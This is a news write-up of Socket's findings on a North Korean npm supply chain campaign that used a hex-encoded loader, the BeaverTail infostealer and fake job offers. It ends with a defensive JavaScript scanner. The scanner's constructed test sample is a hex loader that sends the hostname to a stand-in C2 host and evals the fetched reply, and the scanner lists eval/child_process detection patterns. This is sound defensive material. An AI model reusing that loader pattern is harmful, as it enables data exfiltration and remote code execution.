In a detailed exposé, the Socket Threat Research Team has uncovered an ongoing and highly targeted supply chain attack attributed to North Korean threat actors, believed to be linked to the “Contagious Interview” campaign. The attackers are leveraging typosquatted npm packages and sophisticated social engineering to compromise developers and software engineers actively seeking jobs.
The attackers have published 35 malicious npm packages using 24 npm accounts, with six still live at the time of reporting—including react-plaid-sdk, sumsub-node-websdk, and vite-loader-svg. Together, these have been downloaded over 4,000 times.
Each package contains a malicious hex-encoded JavaScript loader known as HexEval. Socket describes its role:
“HexEval Loader collects host metadata, decodes its follow-on script, and, when triggered, fetches and runs BeaverTail, the infostealing second-stage malware linked to the Democratic People’s Republic of Korea (DPRK) attackers.”
This layered malware structure—HexEval → BeaverTail → InvisibleFerret—evades static code scans and leaves little forensic trace in the npm registry.
The campaign begins with convincing social engineering. North Korean operatives masquerade as recruiters on LinkedIn and lure developers with lucrative job offers (e.g., $16,000–$25,000/month). The attackers deliver code assignments embedded with malicious packages, urging victims to execute them outside containerized environments while screen-sharing.
“Victims are approached with lucrative job offers… instructing blockchain developers to interact with a Bitbucket repository as part of a fake recruitment process.”
Once the code is executed, HexEval transmits environment data to a C2 server and fetches BeaverTail, a second-stage malware that targets browser cookies, IndexedDB data, cryptocurrency wallets, and macOS Keychain files. Socket notes:
“BeaverTail scans local file systems… including Brave, Chrome, and Opera profiles. It attempts to extract files like Solana’s id.json and Exodus wallet data.”
The malware adapts dynamically to Windows, macOS, and Linux hosts. In some cases, a third-stage backdoor—InvisibleFerret—is also deployed.
Several packages contain reconnaissance scripts that fingerprint the host:
In the case of jsonsecs, a cross-platform keylogger was also embedded, hooking into OS-level input functions to capture keystrokes in real time.
“The jsonsecs package includes compiled native binaries… enabling exfiltration or real-time surveillance by the threat actors.”
The attackers are evolving. Socket notes a shift from directly embedding malware to a modular, fetch-on-demand approach using HexEval. This makes detection harder and delays the execution of payloads until runtime conditions are met.
Socket warns:
“The campaign is still active, and we expect additional malicious packages to surface.”
They recommend that developers:
- Avoid installing npm packages from unfamiliar or suspicious accounts.
- Use sandboxed or containerized environments for running unknown code.
- Check for typosquatting and inspect the source code of dependencies.
- Use automated supply chain security tools that detect behavior-based anomalies.
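As an added example (not code from Socket's report), the following heuristic scanner flags the loader pattern described above: a long hex string literal that, once decoded, contains runtime evaluation, process spawning, network fetches or host-fingerprinting calls, or a `Buffer.from(..., "hex")` result that is passed to `eval`. The two sample sources, the `c2.example.invalid` URL and the indicator list are constructed for illustration.

```javascript
// Added example, not code from Socket's report: a defensive heuristic that
// flags hex-encoded JavaScript loaders of the kind described above. It finds
// long hex string literals, decodes them and checks the decoded text for
// runtime evaluation, process spawning, network fetches and host fingerprinting.
// Sample sources and the URL below are constructed, not real.

// A string literal holding at least 24 bytes of hex (48 hex digits).
const HEX_LITERAL = /(["'`])((?:[0-9a-fA-F]{2}){24,})\1/g;

// Indicators checked against the decoded text, in reporting order.
const INDICATORS = [
  { name: "eval", re: /\beval\b|new\s+Function\s*\(/ },
  { name: "child_process", re: /require\s*\(\s*["']child_process["']\s*\)/ },
  { name: "network", re: /\b(?:fetch|https?\.get|https?\.request|axios)\b/ },
  { name: "host-metadata", re: /process\.platform|os\.hostname\(\)|os\.userInfo\(\)/ },
];

function scanSource(source) {
  const findings = [];
  for (const m of source.matchAll(HEX_LITERAL)) {
    const decoded = Buffer.from(m[2], "hex").toString("utf8");
    const hits = INDICATORS.filter(({ re }) => re.test(decoded)).map(({ name }) => name);
    if (hits.length > 0) findings.push({ offset: m.index, bytes: m[2].length / 2, indicators: hits });
  }
  // Decoding a hex blob and handing the result to eval/Function is itself a loader signature.
  const decodesAndEvals =
    /Buffer\.from\([^)]*["']hex["']\s*\)/.test(source) && /\beval\b|new\s+Function\s*\(/.test(source);
  return { findings, decodesAndEvals, verdict: findings.length > 0 || decodesAndEvals ? "suspicious" : "clean" };
}

// Constructed samples. A plain hex constant (e.g. a key) must not be flagged...
const BENIGN_SAMPLE = 'const KEY = "deadbeefdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"; module.exports = KEY;';

// ...while a module that hides its stage in hex, decodes it and evals it must be.
const STAGE = 'const os=require("os");fetch("https://c2.example.invalid/"+os.hostname()).then(r=>r.text()).then(eval);';
const LOADER_SAMPLE = `const h="${Buffer.from(STAGE).toString("hex")}";eval(Buffer.from(h,"hex").toString());`;

console.log("benign:", scanSource(BENIGN_SAMPLE).verdict);
console.log("loader:", JSON.stringify(scanSource(LOADER_SAMPLE), null, 2));
```

The hex-constant sample shows the scanner does not fire on mere hex data; only decoded text carrying the listed indicators, or the decode-then-eval pairing, raises the verdict.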